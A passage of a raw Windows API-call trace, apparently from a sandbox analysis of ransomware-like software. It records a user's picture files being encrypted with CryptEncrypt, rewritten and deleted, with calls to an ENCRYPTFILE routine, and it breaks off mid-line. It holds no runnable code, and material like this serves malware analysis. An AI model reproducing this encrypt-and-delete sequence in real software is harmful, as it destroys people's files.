[0090.604] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b07d0*, pdwDataLen=0x144e790*=0x167bc, dwBufLen=0x167c0 | out: pbData=0x49b07d0*, pdwDataLen=0x144e790*=0x167c0) returned 1 [0090.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.606] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x167c0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x167c0, lpOverlapped=0x0) returned 1 [0090.610] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.610] CryptDestroyKey (hKey=0x41ac600) returned 1 [0090.610] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.610] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.610] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.611] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0090.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.611] FreeLibrary (hLibModule=0x756e0000) returned 1 [0090.611] CloseHandle (hObject=0x258) returned 1 [0090.611] CloseHandle (hObject=0x298) returned 1 [0090.621] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg", lpFilePart=0x0) returned 0x2e [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0090.621] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\wwif_sr6x0w3shayx.jpg")) returned 0x20 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0090.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0090.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.622] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c02b90, ftCreationTime.dwHighDateTime=0x1d5e2ee, ftLastAccessTime.dwLowDateTime=0xa75c3350, ftLastAccessTime.dwHighDateTime=0x1d5e674, ftLastWriteTime.dwLowDateTime=0xa75c3350, ftLastWriteTime.dwHighDateTime=0x1d5e674, nFileSizeHigh=0x0, nFileSizeLow=0x167bc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="wWIF_SR6x0w3shayx.jpg", cAlternateFileName="WWIF_S~1.JPG")) returned 0x41ac280 [0090.622] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\wwif_sr6x0w3shayx.jpg")) returned 1 [0090.683] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c02b90, ftCreationTime.dwHighDateTime=0x1d5e2ee, ftLastAccessTime.dwLowDateTime=0xa75c3350, ftLastAccessTime.dwHighDateTime=0x1d5e674, ftLastWriteTime.dwLowDateTime=0xa75c3350, ftLastWriteTime.dwHighDateTime=0x1d5e674, nFileSizeHigh=0x0, nFileSizeLow=0x167bc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="wWIF_SR6x0w3shayx.jpg", cAlternateFileName="WWIF_S~1.JPG")) returned 0 [0090.683] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0090.684] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0090.684] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0090.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0090.685] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0090.685] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0090.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0090.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0090.685] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0090.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0090.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0090.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0090.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0090.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0090.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0090.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0090.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0090.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0090.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0090.687] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0090.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0090.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0090.687] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0090.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0090.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0090.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0090.688] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\XwG8Sj1nv9U.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c96c10, ftCreationTime.dwHighDateTime=0x1d5ec63, ftLastAccessTime.dwLowDateTime=0x4abbb4e0, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x4abbb4e0, ftLastWriteTime.dwHighDateTime=0x1d5e480, nFileSizeHigh=0x0, nFileSizeLow=0x11095, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="XwG8Sj1nv9U.bmp", cAlternateFileName="XWG8SJ~1.BMP")) returned 0x41ac540 [0090.688] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0090.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0090.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0090.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0090.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0090.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0090.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0090.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.688] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0090.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0090.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bd8 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0090.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0090.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0090.689] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0090.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.690] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0090.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0090.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0090.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0090.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0090.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0090.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bc0 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0090.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0090.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0090.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0090.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0090.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0090.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x1780000, 